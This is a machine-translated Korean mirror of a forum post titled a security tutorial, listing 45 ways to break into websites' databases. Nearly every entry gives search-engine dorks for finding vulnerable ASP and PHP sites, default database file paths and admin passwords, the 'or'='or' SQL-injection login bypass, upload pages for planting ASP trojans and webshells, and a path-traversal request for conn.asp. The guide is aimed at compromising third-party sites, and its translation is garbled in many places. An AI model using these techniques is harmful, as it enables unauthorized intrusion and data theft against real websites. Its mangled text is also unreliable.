이 글은 기계 번역의 미러 문서이며, 원본 기사로 바로 이동하려면 여기를 클릭해 주세요.

보기: 501567|회답: 1

[안전 튜토리얼] 데이터베이스를 얻는 45가지 방법

[링크 복사]
게시됨 2014. 12. 22. 오후 11:11:20 | | |
1,
구글에 가서 키워드를 검색해보세요, edit.asp?   한국산 육계가 많고, 대부분 MSSQL 데이터베이스입니다!

2,
구글에 가서 site:cq.cn inurl:asp

3,
닭 파기 도구와 ASP 트로이 목마를 활용하세요.
파일 이름은 login.asp
경로 그룹은 /manage/입니다
핵심 단어는 went.asp
'or' = 'or'를 사용해 착지시하세요

4,
키워드: Co Net MIB 버전 1.0 웹사이트 백그라운드 관리 시스템

계정 비밀번호는 'or'='or'입니다.


5.
동적 쇼핑 시스템
inurl:help.asp登陆,如未注册成为会员!

upLoad_bm1.asp와 upLoad_c1.asp은 무작위 선택이며, 대부분의 관리자는 이 두 취약점을 무시합니다


6。
기본 데이터베이스 주소는 blogdata/acblog.asa
  키워드: acblog

7.
바이두 /htdocs
등록 시 ASA 파일을 직접 업로드할 수 있습니다!


8.
/Database/#newasp.mdb
키워드: NewAsp SiteManageSystem 버전


9.
굴착기를 사용해           
키워드: WEBBOY가 제공함
페이지: /upfile.asp

10.
baidu에서 Ver5.0 Build 0519 키워드를 검색하세요
(업로드 취약점이 있습니다)

11.
Upfile_Article.asp BBS/upfile.asp
키워드를 입력하세요: powered by mypower,

12.
inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站

13.
이제 구글은 intitle:website assistant inurl:asp 키워드를 검색하고 있습니다

14.
키워드: 홈 최신 뉴스 초보자 가이드 댄스 음악 다운로드 센터 클래식 기사 선수 스타일 장비 구매 사이트 소문 우정 연결 이 사이트 포럼

치킨 팀 setup.asp이라는 키워드를 이해해 보세요


15.
VBulletin 포럼 데이터베이스
기본 데이터베이스 주소!
/includes/functions.php
도구:
1. 웹사이트 헌터 다운로드 주소: 바이두 구글!
2. 구글
키워드:
지원: vBulletin 버전 3.0.1
지원: vBulletin 버전 3.0.2
지원: vBulletin 버전 3.0.3
그중 하나면 충분해요

16.
1. 바이두나 구글 검색 및 입력 제공 코머서스 ASP 쇼핑카트
오픈 소스. 여기는 쇼핑몰 시스템이야.
2. 웹사이트 하단에는 Comersus Open Technologies LC가 있습니다. 열어보고 ~~코머서스 시스템~
comersus.mdb 맞혀 보세요. 는 데이터베이스 이름입니다
데이터베이스는 database/, 다음에 배치됩니다.
그래서 데이터베이스/comersus.mdb
comersus_listCategoriesTree.asp 데이터베이스/comersus.mdb로 변경되어 다운로드할 수 없습니다.
그 다음 이전 저장소를 삭제하고 데이터베이스/comersus.mdb를 추가해서 시도해 보세요

17.
걱정 없는 레전드 공식 사이트 프로그램.
      1. 백그라운드 관리 주소: 도메인 이름 /msmiradmin/ http://
      2. 기본 배경 관리 계정: msmir
      3. 기본 백그라운드 관리 비밀번호: msmirmsmir
데이터베이스 파일은 도메인 이름 /msmirdata/http:// msmirArticle.mdb
데이터베이스 연결 파일은 ***********/Conn.asp

18.
백두에 /skins/default/를 입력하세요.

19.
굴착기를 활용하세요
크리티컬 메커니즘: 디스쿠즈의 파워
경로: /wish.php
협력:
디스쿠즈! 포럼 wish.php 원격 포괄적 취약점 도구 사용

20.
취약점 업로드.
도구: Domain3.5
    웹사이트 헌터 버전 1.5
키워드 powered by mypower
감지된 페이지나 파일이 upfile_photo.asp에 삽입됩니다


21.
새로운 클라우드 취약점
이 취약점은 ACCESS와 SQL에 모두 적용되는 일률입니다.
구글 검색 키워드 "이 사이트 소개 - 사이트 도움말 - 광고 협력 - 다운로드 명세서 - 우정 연결 - 사이트맵 - 로그인 관리"
Flash/downfile.asp?url=uploadfile/: /.. /conn.asp 사이트 루트에 커밋합니다. 다운로드하실 수 있습니다conn.asp
대부분은 소스 코드, 소프트웨어 등 다운로드 스테이션입니다.
데이터베이스가 앞이나 중간에 +라면 #을 %23으로 대체해 다운로드할 수 있다는 경우가 자주 있습니다
\database\%23newasp.mdb
example:#xzws.mdb %23xzws.mdb 변경

22.
올 이트 올 몰 + 파워 업로드 시스템

사용한 도구: Dig Chicken v1.1 밍 보이
마켓플레이스**:
키워드: 쇼핑->장바구니에 추가->계산대로 이동->수인 정보 확인-결제 수단>-> 배송 방법-> 온라인 결제 또는 주문 후 송금-송금 확인>-배송->> 완료
취약점 페이지 :upload.asp   
      upfile_flash.asp

파워**:
키워드: mypower 제공
취약점 페이지 :upfile_photo.asp
      Upfile_Soft.asp
      upfile_adpic.asp
      upfile_softpic.asp

23.
취약점 삽입
바이두가 ioj의 블로그를 검색하다

24
이동이 쉽습니다
열목차
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp

25.
도구: 웹사이트 헌터
Keywords:inurl:Went.asp
접미사: 관리/login.asp
비밀번호: '또는 '또는 '또는 '

26.
**워크래프트 프라이빗 서버
필요한 도구: ASP 트로이 목마.
        도메인 3.5 밍 키드
키워드: 올라이트 리저브 디자인: 게임 얼라이언스
배경 주소: 관리자/login.asp
데이터베이스 주소: chngame/#chngame.mdb

27.
이 취약점은 관리자의 IIS 설정을 악용하는 실수입니다
백두(baidu) 키워드를 사용하는 것은 비교적 드문 문자 이름입니다
무빙 네트워크: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
이동: admin_articlerecyclebin.asp

28.
외국 기지의 데이터베이스 폭발 취약점
키워드: 슬픈 레이븐의 방명록
비밀번호 주소: /passwd.dat
배경 주소: /admin.php

29.
Discuz 4.1.0 크로스 사이트 취약점
도구 활용: 1. WAP 브라우저
      2. WAP 인코딩 변환기
키워드: "intextiscuz!" 4.1.0"

30.
키워드: 샹크스
배경 경로 /시스템/manage.asp
ASP 트로이목마 직접 전송

31.
도구
1: 웹사이트 헌터
2: 말레이시아 1
키워드: 쿠키를 끄지 마세요. 그렇지 않으면 로그인할 수 없습니다
삽입diy.asp

32.
키워드: Team5 스튜디오 판권 보유
기본 데이터베이스: 데이터/team.mdb

33.
도구: 굴착기 푸첸 데이터베이스 리더
키워드: 회사 프로필 제품 디스플레이 제품 목록
접미사 추가: /database/myszw.mdb
배경 주소: admin/Login.asp

34.
주요 하위 XXX inurl:Nclass.asp
"시스템 설정"에 트로이 목마를 작성하세요.
config.asp에 구해질 것이다.

35.
백그라운드에 들어가지 않아도 여전히 웹쉘을 사용합니다
data.asp?action=BackupData 데이터베이스 백업의 기본 경로

36.
도구: 웹사이트 헌터용 WebShell
Keywords:inurl:Went.asp
접미사: 관리/login.asp
약한 비밀번호: '또는 '='또는 '

37.
키워드: 부정 byCDN_NEWS
기사를 스캔하고 '를 추가해서 주입 지점을 테스트하세요
백엔드 주소가 :admin_index.asp

38.
**천둥풀 보도자료 시스템
키워드: leichinews
레이치뉴스 다음에 있는 것을 제거하세요.
태그: admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
그럼 말을 업로드하세요.....
Uppic anran.asp Landing Horse를 방문하세요.

39.
키워드: Ower 문서 관리 시스템 버전 3.0 빌드 20030628
기본 데이터베이스: database\yiuwekdsodksldfslwifds.mdb
배경 주소: 스스로를 스캔하세요!

40.
1. 구글 검색을 통해 많은 수의 주입 지점을 찾기
Keywords: asp?id=1 gov.jp/ asp?id=
페이지 수: 100
언어: 원하는 언어를 작성하세요 **

41.
키워드: 제공: 94KKBBS 2005
비밀번호 복구 기능을 사용해 관리자를 찾아보세요
질문: dddddd 답변: dddddd

42.
Keywords:inurl:Went.asp
배경은 관리/login.asp
백그라운드 비밀번호: 'or'=' 또는 'or'='or' 로그인하여 입력하세요
기본 데이터베이스 주소는 atabase/DataShop.mdb

43.
키워드: ****** inurl:readnews.asp
마지막 값을 5%c로 바꾸고, 데이터베이스를 직접 노출한 뒤 비밀번호를 확인한 뒤 백그라운드를 입력하세요
그냥 뉴스를 추가하세요. 제목에 트로이 목마 문장을 입력하세요.

44.
도구: 트로이 목마
  BBsXp 5.0 sp1 admin guesser
키워드: bbsxp5.00 제공
배경으로 가서 문장 한 문장 뒤로 가세요!

45.
키워드: 프로그램 핵심: BJXSHOP 온라인 스토어 오프닝 전문가
배경: /admin




이전의:리눅스 안티-DDoS 공격 도구 (D) DoS-Deflate
다음:해커 접근법 - 해커는 어떻게 만들어지는가?
게시됨 2017. 7. 20. 오전 6:57:43 |
이런 걸 위한 소프트웨어가 있을까요? 외국 소 학교 문학 자료를 좀 구하고 싶어요
면책 조항:
Code Farmer Network에서 발행하는 모든 소프트웨어, 프로그래밍 자료 또는 기사는 학습 및 연구 목적으로만 사용됩니다; 위 내용은 상업적 또는 불법적인 목적으로 사용되지 않으며, 그렇지 않으면 모든 책임이 사용자에게 부담됩니다. 이 사이트의 정보는 인터넷에서 가져온 것이며, 저작권 분쟁은 이 사이트와는 관련이 없습니다. 위 내용은 다운로드 후 24시간 이내에 컴퓨터에서 완전히 삭제해야 합니다. 프로그램이 마음에 드신다면, 진짜 소프트웨어를 지원하고, 등록을 구매하며, 더 나은 진짜 서비스를 받아주세요. 침해가 있을 경우 이메일로 연락해 주시기 바랍니다.

Mail To:help@itsvse.com